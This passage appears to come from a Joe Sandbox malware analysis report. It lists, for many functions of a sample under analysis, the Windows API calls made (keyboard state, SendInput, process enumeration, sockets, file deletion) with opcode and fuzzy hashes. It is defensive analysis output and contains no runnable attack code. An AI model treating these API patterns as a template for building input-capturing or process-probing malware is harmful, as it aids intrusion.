                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 780b20f865b42480c59923006df07e097607afffb7a0adc8d16055ac8065ac63
                                                                                                                                        • Instruction ID: 90d243a832508869ac74c78a2b392b7ec76517942b6772958a57766801537592
                                                                                                                                        • Opcode Fuzzy Hash: 780b20f865b42480c59923006df07e097607afffb7a0adc8d16055ac8065ac63
                                                                                                                                        • Instruction Fuzzy Hash: 4DC17B75A1020AEFDB54EFA4C898AAEB7F5FF48354F108598E405EB261C770EE45CB90
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                        • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                                        • Instruction ID: 7e033d6a3821c73666c963d78fed0da14c6f562174248a2cf08d2fd4f5e7eb0a
                                                                                                                                        • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                                        • Instruction Fuzzy Hash: 36A146729007869FEB11CF18C8917AEBFE4EF65395F2841EDE9859B281C3388989C750
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1998397398-0
                                                                                                                                        • Opcode ID: 04df062929dbfe9b69e5e37cc5cf5dc81b4998864ab65bdce7da327f665f2bee
                                                                                                                                        • Instruction ID: 546025069ef195b73b72722bedb0e49a1d8421e11d890dde4b01c7dacdc7c46c
                                                                                                                                        • Opcode Fuzzy Hash: 04df062929dbfe9b69e5e37cc5cf5dc81b4998864ab65bdce7da327f665f2bee
                                                                                                                                        • Instruction Fuzzy Hash: 20A15C756183109FC700DF28C595A2AB7E5FF89714F14889DF98AAB362DB30EE05CB91
                                                                                                                                        APIs
                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BBFC08,?), ref: 00B805F0
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BBFC08,?), ref: 00B80608
                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00BBCC40,000000FF,?,00000000,00000800,00000000,?,00BBFC08,?), ref: 00B8062D
                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00B8064E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                        • Opcode ID: 8ea531007ee02223cf3b611fe8757939f87693f8cdfd6b5e2679a34b592f8db6
                                                                                                                                        • Instruction ID: 3048767aa73dd35d10e0673d45fc15e365cc96d43240054da5a3df3c6b19de71
                                                                                                                                        • Opcode Fuzzy Hash: 8ea531007ee02223cf3b611fe8757939f87693f8cdfd6b5e2679a34b592f8db6
                                                                                                                                        • Instruction Fuzzy Hash: AE812D71A10109EFCB44EF94C984DEEB7F9FF89315F104598E506AB260DB71AE0ACB60
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: 89b0913e638a9aab7909a0c38619b41dbae3e579dd10957db5f4d4a009eb38ed
                                                                                                                                        • Instruction ID: f8ea6aeec60bc055efc842cccab9f72db4c65a04f1b0790f5e1d821e7e9fb893
                                                                                                                                        • Opcode Fuzzy Hash: 89b0913e638a9aab7909a0c38619b41dbae3e579dd10957db5f4d4a009eb38ed
                                                                                                                                        • Instruction Fuzzy Hash: 21413C31A00111ABDB21ABBD8C467BE3BE4EF41370F1C4AE5F819D7391EE7889456A61
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BB62E2
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00BB6315
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00BB6382
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                        • Opcode ID: b721f5f74a25db22aa362cc5874b4073eb546fce439c3afa0f5cb177f08a90e1
                                                                                                                                        • Instruction ID: 0a800a64b4714d368e2aa5fcda00efcc674b7092b5d5f0fd4b9c9ff511cd544f
                                                                                                                                        • Opcode Fuzzy Hash: b721f5f74a25db22aa362cc5874b4073eb546fce439c3afa0f5cb177f08a90e1
                                                                                                                                        • Instruction Fuzzy Hash: F6511B74900209EFDB14DF58D8809FE7BF5EB55360F1086A9F91597290DBB4ED41CB90
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00BA1AFD
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA1B0B
                                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BA1B8A
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA1B94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1881357543-0
                                                                                                                                        • Opcode ID: 7ee7e71b8a331edcacdf2148ed84cb0b03818ca3026d757381f8d43bdac57a3a
                                                                                                                                        • Instruction ID: c47f5764c77cde42ba5fe5952c80cbd8bfaad14a8a2dfc0977c7a590a9873281
                                                                                                                                        • Opcode Fuzzy Hash: 7ee7e71b8a331edcacdf2148ed84cb0b03818ca3026d757381f8d43bdac57a3a
                                                                                                                                        • Instruction Fuzzy Hash: 8541B234640210AFE720EF24D886F6977E5EF49718F548488F91A9F7D2DB72DD418B90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e1fdb02bf283e8f951a7e44e4e727eee84584a9be5c42bb0f7816f73af6ebe34
                                                                                                                                        • Instruction ID: 22f71daf4c8e7a5a2aa85f86fdc99032c82c1095f1221993482c76454407e74d
                                                                                                                                        • Opcode Fuzzy Hash: e1fdb02bf283e8f951a7e44e4e727eee84584a9be5c42bb0f7816f73af6ebe34
                                                                                                                                        • Instruction Fuzzy Hash: E4410672A00314AFD7249F38CC41F6ABBE9EB88711F2045EEF951DB382D77199058B80
                                                                                                                                        APIs
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B95783
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B957A9
                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B957CE
                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B957FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                        • Opcode ID: b4392bc3ae275442a637f25834fde030f9f5f97608f8ef72e650dc0df1955460
                                                                                                                                        • Instruction ID: e4de8423afb4039bde635c101f54998e269c59c72a1f94a6cb4c1f064a54315b
                                                                                                                                        • Opcode Fuzzy Hash: b4392bc3ae275442a637f25834fde030f9f5f97608f8ef72e650dc0df1955460
                                                                                                                                        • Instruction Fuzzy Hash: 68412D35600610DFCB11EF55D594A5EBBE1EF99320B18C4D8E84A6B362CB34FD00CB95
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00B46D71,00000000,00000000,00B482D9,?,00B482D9,?,00000001,00B46D71,8BE85006,00000001,00B482D9,00B482D9), ref: 00B5D910
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B5D999
                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B5D9AB
                                                                                                                                        • __freea.LIBCMT ref: 00B5D9B4
                                                                                                                                          • Part of subcall function 00B53820: RtlAllocateHeap.NTDLL(00000000,?,00BF1444,?,00B3FDF5,?,?,00B2A976,00000010,00BF1440,00B213FC,?,00B213C6,?,00B21129), ref: 00B53852
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                        • Opcode ID: 621ad183bd8b419b5816bc652898808718700570c3e0d12cef09c49cece6f3d2
                                                                                                                                        • Instruction ID: cdc30b0820d69ceea78ba2ad2e12e7c3626e3e115bffcccb09d97b61f7824f2b
                                                                                                                                        • Opcode Fuzzy Hash: 621ad183bd8b419b5816bc652898808718700570c3e0d12cef09c49cece6f3d2
                                                                                                                                        • Instruction Fuzzy Hash: 7431AD72A0020AABDF24DF64DC85EAE7BE5EB41711B0542E8FC04E7251EB35CD58CBA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00BB5352
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BB5375
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB5382
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BB53A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3340791633-0
                                                                                                                                        • Opcode ID: 4c3418a6949128e5cbe8b3228ca77df24aef751d88f3731d555c6ca5d07fb3bb
                                                                                                                                        • Instruction ID: dd12fd111dc8657996a23184f25db4b8b2936a8930b96859d558291b8fbd97c5
                                                                                                                                        • Opcode Fuzzy Hash: 4c3418a6949128e5cbe8b3228ca77df24aef751d88f3731d555c6ca5d07fb3bb
                                                                                                                                        • Instruction Fuzzy Hash: B4319E34A55A08EFEB309A14CC56BF877E5EB05390F584182BA12973E1C7F5A980DB4B
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B8ABF1
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B8AC0D
                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B8AC74
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B8ACC6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 98a8b45af8a5681dc00434ca44f5f9dffe78de61dc17d6589e58b61b0e4ab017
                                                                                                                                        • Instruction ID: 38d89b51a71bf1a7895f31494d50a029ca171e9dc6d0557c50427d9f7c956af7
                                                                                                                                        • Opcode Fuzzy Hash: 98a8b45af8a5681dc00434ca44f5f9dffe78de61dc17d6589e58b61b0e4ab017
                                                                                                                                        • Instruction Fuzzy Hash: 8B310370A00618AFFF24EA698C04BFA7BE5EB89310F08439BE481921E0C3759985CB52
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00BB769A
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BB7710
                                                                                                                                        • PtInRect.USER32(?,?,00BB8B89), ref: 00BB7720
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00BB778C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                        • Opcode ID: 27c06ebad4a671a563a574c9f4ae5be584267815b1718c114ed31f6556c76429
                                                                                                                                        • Instruction ID: 737c6dce17ed7137b739016154dea226c482063181209f1c78970a45d84447fd
                                                                                                                                        • Opcode Fuzzy Hash: 27c06ebad4a671a563a574c9f4ae5be584267815b1718c114ed31f6556c76429
                                                                                                                                        • Instruction Fuzzy Hash: 1C416834A49214DFCB12CF5AC894EB97BF4FB88300F1585E8E4259B261CFB0AD42CB90
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00BB16EB
                                                                                                                                          • Part of subcall function 00B83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83A57
                                                                                                                                          • Part of subcall function 00B83A3D: GetCurrentThreadId.KERNEL32 ref: 00B83A5E
                                                                                                                                          • Part of subcall function 00B83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B825B3), ref: 00B83A65
                                                                                                                                        • GetCaretPos.USER32(?), ref: 00BB16FF
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00BB174C
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00BB1752
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                        • Opcode ID: 9e1dc3c744508119d88b333589d1fc61c16f7344ba02cf604fbcee3418166aa5
                                                                                                                                        • Instruction ID: 3f38048592ff44579ee11fc3e894e5b9b21ca9b99577319da514eff39023a25f
                                                                                                                                        • Opcode Fuzzy Hash: 9e1dc3c744508119d88b333589d1fc61c16f7344ba02cf604fbcee3418166aa5
                                                                                                                                        • Instruction Fuzzy Hash: 3A3152B1D00159AFC704EFAAD881DEEBBF9EF48304B5080A9E419E7211DB71DE45CBA0
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B8D501
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00B8D50F
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00B8D52F
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B8D5DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                        • Opcode ID: 2b19629de2ddbfaf40774961e36c6c12195b1b0f89793fff6571d64ae32d350a
                                                                                                                                        • Instruction ID: 50d344f7c69e900f8cded4c056d6875962880d4a5815d0cacda8370647470895
                                                                                                                                        • Opcode Fuzzy Hash: 2b19629de2ddbfaf40774961e36c6c12195b1b0f89793fff6571d64ae32d350a
                                                                                                                                        • Instruction Fuzzy Hash: 6731B1711083009FD300EF54D881AAFBBF8EF99354F54096EF589971A1EB71D948CBA2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BB9001
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B77711,?,?,?,?,?), ref: 00BB9016
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00BB905E
                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B77711,?,?,?), ref: 00BB9094
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
